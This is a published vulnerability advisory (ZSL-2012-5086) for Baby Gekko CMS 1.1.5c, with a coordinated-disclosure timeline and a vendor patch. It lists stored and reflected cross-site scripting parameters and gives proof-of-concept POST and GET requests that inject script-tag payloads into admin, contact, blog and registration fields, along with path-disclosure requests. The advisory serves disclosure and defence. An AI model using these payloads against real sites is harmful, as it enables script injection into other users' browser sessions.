1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 |
Baby Gekko CMS v1.1.5c Multiple Stored Cross-Site Scripting Vulnerabilities Vendor: Baby Gekko, Inc. Product web page: http://www.babygekko.com Affected version: 1.1.5c Summary: BabyGekko strives to deliver high quality websites and other web content fast and easy for all end users. It is a lightweight, extensible content management system platform for publishing websites, intranets, or blogs. Desc: Baby Gekko CMS suffers from multiple stored (post-auth) XSS vulnerabilities and path disclosure issues when parsing user input to several parameters via GET and POST method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session or disclose the full installation path of the affected CMS. Overall the vulnerable parameters to XSS are: ------------------------------------------- Reflected (Non-Persistent) XSS: 1. username 2. password 3. verification_code 4. email_address 5. password_verify 6. firstname 7. lastname Stored (Persistent) XSS: 8. groupname 9. virtual_filename 10. branch 11. contact_person 12. street 13. city 14. province 15. postal 16. country 17. tollfree 18. phone 19. fax 20. mobile 21. title 22. meta_key 23. meta_description ------------------------------------------- Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.21 PHP 5.3.9 MySQL 5.5.20 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk Vendor status: [05.04.2012] Vulnerabilities discovered. [05.04.2012] Initial contact with the vendor. [06.04.2012] Vendor responds asking more details. [07.04.2012] Sent details to the vendor. [09.04.2012] Vendor replies confirming the issues. [10.04.2012] Working with the vendor. [02.05.2012] Vendor releases patched version 1.2.0 to address these issues. [02.05.2012] Coordinated public security advisory released. Advisory ID: ZSL-2012-5086 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5086.php Vendor Advisory: http://www.babygekko.com/site/news/general/baby-gekko-v1-2-0-released-with-3rd-party-independent-security-testing-performed-by-zero-science-lab.html 05.04.2012 -- Stored XSS: ---------------------------------------------------------------------------------------------- ############################################################################################## POST http://localhost/gekkocms/admin/index.php?app=users&action=savecategory HTTP/1.1 cid new groupname "><script>alert(1);</script> status 1 btn_save Submit ############################################################################################## ---------------------------------------------------------------------------------------------- POST http://localhost/gekkocms/admin/index.php?app=contacts&action=saveitem HTTP/1.1 btn_save Submit id new category_id 0 title Zero Science Lab status 1 virtual_filename "><script>alert(1);</script> branch "><script>alert(2);</script> contact_person "><script>alert(3);</script> street "><script>alert(4);</script> city "><script>alert(5);</script> province "><script>alert(6);</script> postal "><script>alert(7);</script> country "><script>alert(8);</script> tollfree "><script>alert(9);</script> phone "><script>alert(10);</script> fax "><script>alert(11);</script> mobile "><script>alert(12);</script> email lab@zeroscience.mk display_email 0 additional_info ZSL ############################################################################################## ---------------------------------------------------------------------------------------------- POST http://localhost/gekkocms/admin/index.php?app=menus&action=savecategory cid new title "><script>alert(1);</script> status 1 btn_save Submit ############################################################################################## ---------------------------------------------------------------------------------------------- POST http://localhost/gekkocms/admin/index.php?app=users&action=saveitem HTTP/1.1 id new category_id 4 username test password test email_address a@a.com firstname "><script>alert(1);</script> lastname "><script>alert(2);</script> status 1 btn_save Submit ############################################################################################## ---------------------------------------------------------------------------------------------- POST http://localhost/gekkocms/admin/index.php?app=blog&action=saveitem (vulnerable: 6, 7) date_created 2012-04-05 23:41:09 date_modified 2012-04-05 23:41:09 date_available 2012-04-05 23:41:09 date_expiry 2012-04-05 23:41:09 options[] display_pagetitle options[] display_items_summary_noread options[] display_items_author options[] display_items_date_created options[] display_items_date_modified permission_read_everyone everyone permission_read[] 1 permission_read[] 2 permission_read[] 3 permission_read[] 4 permission_read[] 5 permission_write[] 1 meta_key "><script>alert(1);</script> meta_description "><script>alert(2);</script> btn_save Submit id new category_id 1 title TEST status 1 virtual_filename testing summary ZSL description Zero Science Lab created_by_id 1 modified_by_id 1 ############################################################################################## ---------------------------------------------------------------------------------------------- Reflected URI-Based XSS: ---------------------------------------------------------------------------------------------- ############################################################################################## GET /gekkocms/admin/index.php/"><script>alert(1);</script> HTTP/1.1 ############################################################################################## ---------------------------------------------------------------------------------------------- Reflected XSS: ---------------------------------------------------------------------------------------------- ############################################################################################## POST http://localhost/gekkocms/users/action/register HTTP/1.1 _csrftoken b9fe8295484875cda8fc84393151b97b10feeef2 username EdwardNigma email_address lab@zeroscience.mk password "><script>alert(1);</script> password_verify "><script>alert(2);</script> firstname "><script>alert(3);</script> lastname "><script>alert(4);</script> submit Submit ############################################################################################## ---------------------------------------------------------------------------------------------- Path Disclosure: ---------------------------------------------------------------------------------------------- ############################################################################################## GET http://localhost/gekkocms/admin/templates/babygekko/index.php HTTP/1.1 GET http://localhost/gekkocms/templates/html5demo/index.php HTTP/1.1 ---------------------------------------------------------------------------------------------- ############################################################################################## |